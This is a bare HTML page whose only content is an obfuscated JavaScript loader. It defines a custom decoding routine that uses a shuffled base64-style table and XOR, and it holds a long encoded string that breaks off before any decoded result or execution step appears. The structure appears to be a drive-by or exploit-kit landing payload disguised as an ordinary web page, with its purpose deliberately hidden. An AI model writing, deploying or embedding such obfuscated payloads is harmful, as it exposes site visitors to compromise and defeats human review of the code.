<html><body><script language="JavaScript">function NR6Ifqy1sjC5LG(lxquta){return String.fromCharCode(lxquta);}function d9O0JESi(aK5l2I4B4Ns){var qwjn8rCQbJQi=0,SaQtKOIFDBc=aK5l2I4B4Ns.length,hlfoEONsiR=1024,mkgvo4oJjPjd,kvzL8b,MNNUbmsUUJ9="",zpBst=qwjn8rCQbJQi,CcOvF9=qwjn8rCQbJQi,z9PIj7=qwjn8rCQbJQi,LUUjGM=Array(63,5,14,1,44,46,39,13,23,47,0,0,0,0,0,0,33,26,22,30,25,29,9,18,56,4,36,52,53,41,49,0,32,6,7,28,55,48,34,21,2,42,20,0,0,0,0,38,0,43,54,31,12,40,27,35,37,50,17,62,24,57,60,59,61,8,11,16,58,19,15,45,51,3,10);for(kvzL8b=Math.ceil(SaQtKOIFDBc/hlfoEONsiR);kvzL8b>qwjn8rCQbJQi;kvzL8b--){for(mkgvo4oJjPjd=Math.min(SaQtKOIFDBc,hlfoEONsiR);mkgvo4oJjPjd>qwjn8rCQbJQi;mkgvo4oJjPjd--,SaQtKOIFDBc--){z9PIj7|=(LUUjGM[aK5l2I4B4Ns.charCodeAt(zpBst++)-48])<<CcOvF9;if(CcOvF9){MNNUbmsUUJ9+=NR6Ifqy1sjC5LG(226^z9PIj7&255);z9PIj7>>=8;CcOvF9-=2;}else{CcOvF9=6;}}}return(MNNUbmsUUJ9);}var egL2kBCc5Bog="ICFg3AmV7ieUYXzPKBwV65YisVYVU5tV8CzVAbzhr6FJRAmhsieUNAFJril@duqJ7klez2qJ@be@RYdJeYq4a5Hh6Ve_wGmiD0F@8ilPB5lgdzn@M_A4LbY4eGpwz9Fh_zpMHXoJr6FhyXMUKXwLgXzJbXrYKkHeuVtTGod@35mgOGEhu2tTfGMMGcz5U2Fx2Cqg1AMV2ctVZXFeUBzP2ttTur7KBonMQXp5vGtb6tdYQ5qLiVYx9zwaABeLB5oTOy4xfbHJWrEhNkHTKXwLgXzJbXrYKkHeuVYxxVaMGTHTKXwLgXzJbXrYKkHeuVYx9XrK5XDYLk7wsfpePXMwUVzwv2tJetdPsQteZBpVPXoTgXFJy5MiZRwxjRwxBrwx8uwxu8wxsuwxs8wxZvwxBfwxjcwxGo4K2rwxGo4K2rwxuywxZonLBoSKBodKjonLjonLuoSKuo4L2cpb2fEL2vEK2vwK2vwL2fpL2RwK2u7K2cpL2fpb2ypL2v7L2ywK2fpK2vpK2fEK2vwxj9wxGo4K2rwxGonLGo4K2fwb2f7L2Rwb2vpL2c7K2cwxZrwxsonKfoSKWoSKso4LsodKBoSK2cwb2ypb2R7L2rwxfodKuodKAo4b28wxuawx88wxsypiDulgsYdYQ5qLiVtT92ehziSPR5egzulPfkqPZ8mJgbnMrGFJPXfMOtear67YQ5qLiVzTKXwLgXzJbXrYKkHeuVAbeAHVZrrYv0niDGlgsYnMQXp5vGtb6kpayAMVd0HVdYd@35mgOGEhu2Yx65qhsXz4hXeg55Sb6AqKokqMfczTKXwLgXzJbXrYKkHeuVAb6AqKokqMfctxvod@35mgOGEhu2txv9S_9XrK5XDYLtmTzyqJ@2zhW9qeU_o_ZAYK6Vr4uiSPz2qJ@be@R2Yhz9DguBwKWQogF6nivfwb054TCvr5_zEgD9q@zvr5_zEgr6maGoY_1Awho_nTYXzPKBwV65Yiu8wbnkz4sozJMBrNscpLr6paUXwas_AwSxpTA6p4HAYK7knTs6p6RtlJR_m4HAYK7k7LD0m6cXm@BCFJdYnaGoY_1Awho5SbcGmPszn5oBH_u07UjyHYOYY@M2e_iBpb8BYJUYmaQ2qJQBE98yl4@Q7PaXeYQ_tPAzfY6AeavQAKO5zPYAlYyYDaV2laGumJ8uwbUYHbvVaJzBq4G2fYHG7MMCYJxQmMGil@UBt4K2aJQitM8tYbPYqgNQAK@5zPaYDLUCDh4XrLx_t4AtlL6tY5j2fhGxz5IVza62Y5WRlJf9zPaXlwU5qgAvF_ezmMZuphyAeVK_qgzklVgbzhuuegjRzMdBA@PBY@WffPZXHYO5zPYAlYyYMgWcYaGypMZfALP2AhVVo5hzt@oGweyCE9WyfMrGfV55qYHiqPNQAKO5zPaVMbPGpYWctLpB74hGzKFttVGRlJf9zPaXHYOCDM12a@pB74hGzhfrtLvQAKO5zPaXe5PAY5157_ezmMZuphyCme1XawWY74sYfJxBMKMVeV2zALwkAK3QagWcYaHGFPaXHYOAHbaXHYOBr4riebuGqY4CtetBpb8gD@PVFLAyAYlBqelGwbPGMajRlJ@5zPaXqLUC7Y42aMtGre_YaeHbAMM2ahZa7e9VD@PVFLAyzL2BpM5z7huYeVNQHLhiA9jQtYO5zPL2eMZ8q4sGzauCEM4bfJ@5zPazaeOQ7PaXHwhzt4BuE@PzFM42mVZxtMsYo_RVFLM2qL3zzPaXHYOXDM4Xfhdzt4AbYexAAh8CHVLBHM8aH_qBFgNQHLhiA980za6VFgVVeV2zALR5e@WTtLjRl4z5FVWil43CEM4boL25m@lGEYyzA9j6eYOQFVzteeWcHVQBEa8REPZRqhO5zPaGAK@5zPaYDLUCDh4XrLx_t4AbYexAAhARH5ZrtPZReeO5zPaXeYQ_tPACE@xYeKZ2Mw3GFPaXHYOCo4M2HLABH@sBo_PAeavQzLakHPgieeHbAMM2ahZa7ejXeJ3AHLjRlJf9zPaXHYO2YK42l4iQp@lGEYyCwgN2Hedzz5BafLRXDhh2r_hBE@gYo_PQoejRHa7GDVgXl43Q7PaXHYO5zP8vYbUXFMNCHLQ_tPU2ra6AY@eXoLOzDPsXqwf0taZ27L3QFPaXHYO5zPtQH5ZrtP82zaP5qg8BeJZ8pMJGwb3G75f_qL7Xpb5Xl43Q7PaXHYO5zPoGweyCme4XtVdCD@GGEL6GzLARqLe5DPjQtYO5zPaGAKO5zPaYl@62AMV2HhL5F48BYJyAw@42eMtGr4hBf@3QDeaXHYizzPjyHYOCfMV2aLZ8qeGGzauCw@MXoLOQf9jyHYO5Y4MCY@i_tMjQtYO5zPZveMZap_ZrEL6zDMAyoLzGrer5eb3GwVKVrJ5XEVzXl4@Q7PaXe@f8rPaXlw6BFMGCHeezm48Bf465fhARH5WY75oBmhyGEPVXHYO5zPIYfLPbAM4QH5Wzz5wBAYxAFLAytgzXpboBmhyGpe82l4ikHPoVrhO5zPaXH5WBHboBMeH5fMVCH5ZrtPZuYJ6Cwasgo5WCmPGYlK3QDeaXHYOBoP_GE@UXFM42m5WCDejyHYOAHbLXHYOBoMWGYJR2zYG2ohL5m4oYf4yYHYWRlJf9zPaXlwU5qgAvMVazm@QbYexAAhARlKO5zPaYqwatzLv_qPtYpKobqPp2tes9YaZ0lVOYabu9fgOboegXpY5BY@1Xe5A6H@aXl9WYqYatAhv_qPtCD@LbqPpYY_s9YadzEeOYab@YlgObaV9XpY5YrKFAfPjXHYO5zPbbqPp5oes9YahAlLOYabu9fgObo4dXpY55eK1Xe51BpPaXl9zbzKatAMeQzPtBlLU5zPpCHVe5YarAlLOYaeWcHYObr@AVtY5Yrh1Xe5Avp4aXl9P5e@uQfeaXHYOBoJOYf@WcHYObo4rVtY5BY@Wye5V2pe7Xl9J5qYatAMh_qPtztKgbqPpBa_e5YarBAVOYabuyDgObaY8ypY5VzhWye51B7@7Xl9YbzYatAwv_qPtBlLRil43Q7PaXHYzGoY5BY@1Xe51Bp@aXl9x5qYattVsv7PtYEVobqPp2qYs9YatkHKOYaeuxlgObrMQXpY5BYKFXe5A6H57Xl9zVFKatY@j6qPtBlLR5zPp2oVe5YahAlLbQlJO5zPaXew7Xl9YYFKatY@G8qPtBlLy5zPp2qYs9YatkHKOYohuulgObrg9XpY55lKuye51B7g7Xl9zVFKatY@ZB7PtBlLR5zPp2oVe5YahAlLOYaeuaAgObrMQAHJNQtYO5zPL2FPtBlLIbqPp2qYs9YatkHKOYoh1GtYObfhAVtY5AqKFXe5V_qeaXl9zVFKatAws87PtBlLR5zPp2oVe5YahAlLOYaeuaAgObrMQVtY5BAMFXe5VBlwzQfPjyHYO5YVK5YatkHKOYabFYlgObrJ9XpY5BrhWye5ARt@aXl9zVFKatAhZBqPtBlLR5zPp2oVe5YahAlLOYaeuaAgObrMQVtY55e@Wye5VBlw7Xl95VFKatzgj8ww3QFPaXHYOAfgObfwAXpY5BfK1Xe5127@7Xl9zVFKatzgjRzPtBlLR5zPp2oVe5YahAlLOYaeuaAgObrMQVtY55e@1Xe51BH@aXl9YYFYatzLh27PtzAVU5zPpBoaQ2D4@5zPaXlwuXe51_lh7Xl9YYFKatY@G8qPtzALIbqPpYe_s9YahVAeOYf@WvoYObo4rVtY5BY@Wye5VBqg7Xl9YYFKatzYj8qPtCD@y5zPpYtLs9YaQzE@OYf@WvqgNQlKO5zPaYqwatY5jv7PtBlLx5zPp2HVs9YarXpKOYae1GtYObo@_XpY5ieK@Xe5A6q@7Xl9YC7KatAMQB7PtBlLR5zPp2oVe5YadAlLOYab@GlgObreeXpY55eKuffPjXHYO5zPbbqPpXfws9YaeGDLOYabFGlgObr@2XpY5BY@Wye51Bp@aXl9x5qYattVZ27PtBl@J5zPpClhs9YarXpKOYaeFGtYObaYgVtY5iqhWye5VBH@aXl9YYFhuQfeaXHYOBoJOYf@1GtYObr4rVtY5Yoguye51_eV7Xl9x5qYatAMQB7PtBlLR5zPp2HVe5YarXpKOYf@1GtYObo@dVtY5YfKuye51B7eaXl9y5qKattVsv7PtzA@Jil43Q7PaXHYzGoY55lMuye5A6q@7Xl95bzYatAMQB7PtBlLR5zPp2oVe5YahBA@OYf@1GtYObr4rVtY5iqK@Xe51Bp@aXl9yBFKatzYj6qPtCD@dbqPpttae5YadXEebQlJO5zPaXew7Xl9J5qYatAMQBqPtBleIbqPpttae5YahAlLOYf@WcHYObrg5XpY5VAK1Xe58BH@aXl9YC7KatY@G8qPtBlLobqPptAas9YahzELOYae1YAgObaY8umJNQtYO5zPL2FPtzA@J5zPpCeMs9YaLkHKOYf@1CHYObo4rVtY5BY@Wye51Bp@aXl95bzKatAMeQzPtzA@IbqPp2fhe5YaQzE@OYoh12HYObreWVtY5BFKuye5VBq4dQfPjyHYO5YVK5YadBA@OYf@FYlgObfw9VtY5BM@Wye5VBH@aXl9yBFYattVsv7PtBl@J5zPpClhs9YatQpKOYf@WutYOboPrXpY55